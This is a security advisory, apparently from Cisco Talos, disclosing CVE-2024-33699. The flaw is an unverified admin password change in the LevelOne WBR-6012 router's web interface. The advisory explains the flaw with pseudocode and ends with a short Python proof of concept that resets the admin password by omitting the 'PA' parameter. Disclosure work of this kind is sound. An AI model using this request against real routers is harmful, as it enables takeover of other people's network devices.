CVE-2024-33699
The LevelOne WBR-6012 router’s web application has a vulnerability in its firmware version R0.40e6, allowing attackers to change the administrator password and gain higher privileges without the current password.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
LevelOne WBR-6012 R0.40e6
WBR-6012 - https://us.level1.com/products/wbr-6012
9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-620 - Unverified Password Change
The WBR-6012 is a wireless SOHO router. It is a low-cost device which functions as an internet gateway for homes and small offices while aiming to be easy to configure and operate. In addition to providing a WiFi access point, the device serves as a 4-port wired router and implements a variety of common SOHO router capabilities such as port forwarding, quality-of-service, web-based administration, a DHCP server, a basic DMZ, and UPnP capabilities.
Using the underlying web application logic, an attacker may change the password without knowledge of the original password.
This requires authentication, but that may be bypassed by exploiting other vulnerabilities (CSRF, IP spoofing).
The function located at 0x800e6944 handles password changes via HTTP. The existing password is not needed to set a new password unless it is provided by using the ‘PA’ HTTP POST parameter. Eliminating the ‘PA’ parameter from the change password requst bypasses the check and allows for a password change without knowing the current password.
For clarity, the below pseudocode is a highly-simplfied representation of the change password logic and has been stripped of unrelated functionality that exists on the device.
ADMIN_PASSWORD = 'admin' /// global for admin password, 'admin' is default
new_password = Pa /// value from HTTP POST param Pa
/// if the 'PA' parameter is present, check it before allowing password change
if (http_param == 'PA') {
admin_password = PA /// value from HTTP POST param PA
/// check if the provided admin password is the correct admin password
if check_password(admin_password):{
/// if correct admin password, change the the admin password
change_password(new_password)
}
}
}
/// If Pa param is present, even if PA is not present
else if (http_param == 'Pa') {
/// check that the new password is different from the current password
if(new_password != ADMIN_PASSWORD);{
/// NOTE THE MISSING PASSWORD CHECK HERE
/// change the admin password
change_password(new_password)
}
}
The below PoC will change the password to ‘test’ if sent from an IP with an authenticated session. The web app doesn’t validate that the password request is coming form somone who knows the existing password. A minimun of 2 HTTP POST paramaters are required but only the “Pa” (new password) parameter is used.
import requests
url = 'http://192.168.1.1/cgi-bin/pass'
data = {'test': 'test', # dummy param
'Pa': 'test', # new password
}
response = str(requests.post(url, data=data).status_code)
print(response)
2024-06-03 - Vendor Disclosure
2024-08-05 - Status update request from TALOS - No reply
2024-09-03 - Status update request - Impending public release notification
2024-10-23 - Vendor notification of upcoming release date
2024-10-30 - Public Release
Discovered by Patrick DeSantis and Francesco Benvenuto of Cisco Talos.